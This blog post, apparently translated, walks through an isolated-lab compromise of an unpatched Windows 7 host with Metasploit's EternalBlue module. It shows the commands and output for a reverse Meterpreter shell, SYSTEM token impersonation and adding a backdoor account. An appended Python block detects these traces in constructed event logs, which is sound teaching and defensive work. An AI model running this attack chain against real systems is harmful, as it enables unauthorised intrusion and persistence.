Notes on penetrating a Win7 host

2022-06-08 14:04:31  Reads: 192  Source: Internet



Lab environment:

Target: Win7 (firewall disabled, MS17-010 "EternalBlue" patch not installed) 192.168.88.135

Attacking machines: Kali 192.168.88.133 (exploitation), Windows 192.168.88.134 (remote-login verification)

Exploitation steps:

  1. Enter the exploitation environment, command msfconsole
  2. Search for the modules matching the EternalBlue vulnerability (MS17-010), command search ms17-010

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce

  3. Use module number 2, command use 2

[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

  4. View the basic settings, command options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.88.133 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs

  5. Set the target host, command set rhosts 192.168.88.135

rhosts => 192.168.88.135

  6. Check the settings again, command options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.88.135 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.88.133 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs

  7. Launch the exploit attempt, command run

[*] Started reverse TCP handler on 192.168.88.133:4444
[*] 192.168.88.135:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.88.135:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7600 x64 (64-bit)
[*] 192.168.88.135:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.88.135:445 - Connecting to target for exploitation.
[+] 192.168.88.135:445 - Connection established for exploitation.
[+] 192.168.88.135:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.88.135:445 - CORE raw buffer dump (23 bytes)
[*] 192.168.88.135:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.88.135:445 - 0x00000010 74 65 20 37 36 30 30 te 7600
[+] 192.168.88.135:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.88.135:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.88.135:445 - Sending all but last fragment of exploit packet
[*] 192.168.88.135:445 - Starting non-paged pool grooming
[+] 192.168.88.135:445 - Sending SMBv2 buffers
[+] 192.168.88.135:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.88.135:445 - Sending final SMBv2 buffers.
[*] 192.168.88.135:445 - Sending last fragment of exploit packet!
[*] 192.168.88.135:445 - Receiving response from exploit packet
[+] 192.168.88.135:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.88.135:445 - Sending egg to corrupted connection.
[*] 192.168.88.135:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.88.135
[*] Meterpreter session 1 opened (192.168.88.133:4444 -> 192.168.88.135:49159) at 2022-06-07 23:22:11 -0400
[+] 192.168.88.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.88.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.88.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

  8. The output shows “WIN”, indicating the exploit succeeded
  9. Enter privilege-escalation mode, command use incognito

Loading extension incognito...Success.

  10. List the available tokens, command list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
yyx-PC\yyx

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

  11. Switch to SYSTEM privileges, command impersonate_token "NT AUTHORITY\SYSTEM"

[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM

  12. Enter the Windows command prompt, command shell

Process 2924 created.
Channel 2 created.
Microsoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

  13. Create a Windows user, command net user oldboy goodITedu@159 /add (choose your own username and password)

net user oldboy goodITedu@159 /add
命令成功完成。

  14. Check whether oldboy now appears in the user list, command net user

net user

\\ 的用户帐户

-------------------------------------------------------------------------------
Administrator Guest oldboy
test yyx
命令运行已完成，但发生一个或多个错误。
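Seen from the target's side, the walkthrough above leaves a recognisable trail: a command shell spawned by the print spooler (the shell step), net user ... /add run as SYSTEM, and an account-creation audit record attributed to SYSTEM instead of an administrator. The Python block below is an added example, not part of the original post: it runs three such rules over constructed Sysmon/Security records supplied as plain dicts, and it assumes the Metasploit eternalblue payload is injected into spoolsv.exe.

```python
import ntpath
SHELLS = {"cmd.exe", "powershell.exe"}

def _base(path):
    return ntpath.basename(path or "").lower()  # file name of a Windows path, None-safe

def is_spooler_shell(ev):
    # Sysmon event 1: a shell whose parent is spoolsv.exe. The print spooler never launches a
    # shell on its own; the Metasploit eternalblue payload (assumption: it injects into
    # spoolsv.exe by default) makes the walkthrough's 'shell' step look exactly like this.
    return (ev.get("EventID") == 1 and _base(ev.get("ParentImage")) == "spoolsv.exe"
            and _base(ev.get("Image")) in SHELLS)

def is_net_user_add(ev):
    # Sysmon event 1: net.exe / net1.exe run as 'net user <name> <password> /add'.
    cmd = (ev.get("CommandLine") or "").lower().split()
    return (ev.get("EventID") == 1 and _base(ev.get("Image")) in {"net.exe", "net1.exe"}
            and "user" in cmd and "/add" in cmd)

def is_system_account_creation(ev):
    # Security event 4720 (account created) whose subject is SYSTEM (S-1-5-18) or the
    # computer account (name ending in '$') rather than a logged-on administrator: that is
    # what 'net user ... /add' issued under an impersonated SYSTEM token produces.
    subj = ev.get("SubjectUserName") or ""
    return ev.get("EventID") == 4720 and (ev.get("SubjectUserSid") == "S-1-5-18" or subj.endswith("$"))

RULES = [("spoolsv_spawned_shell", is_spooler_shell),
         ("net_user_add", is_net_user_add),
         ("account_created_by_system", is_system_account_creation)]

def triage(events):
    """Return (rule name, event index) for every event that a rule matches."""
    return [(name, i) for i, ev in enumerate(events) for name, rule in RULES if rule(ev)]

# Constructed sample records, not captured from the page's lab; names follow the walkthrough.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\spoolsv.exe", "User": r"NT AUTHORITY\SYSTEM"},
    {"EventID": 1, "Image": r"C:\Windows\System32\net1.exe",
     "ParentImage": r"C:\Windows\System32\net.exe", "User": r"NT AUTHORITY\SYSTEM",
     "CommandLine": r"C:\Windows\system32\net1 user oldboy goodITedu@159 /add"},
    {"EventID": 4720, "SubjectUserSid": "S-1-5-18", "SubjectUserName": "YYX-PC$",
     "TargetUserName": "oldboy"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",  # benign: opened from the desktop
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"yyx-PC\yyx"},
]

if __name__ == "__main__":
    for name, idx in triage(SAMPLE_EVENTS):
        print(f"[{name}] event #{idx}: {SAMPLE_EVENTS[idx]}")
```

The first rule on its own is the high-signal one: in the lab above the spooler has no reason to start cmd.exe, so that single parent/child pair fires before any account is touched.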

Source: https://www.cnblogs.com/singeryoung/p/infiltrate-win7-notes.html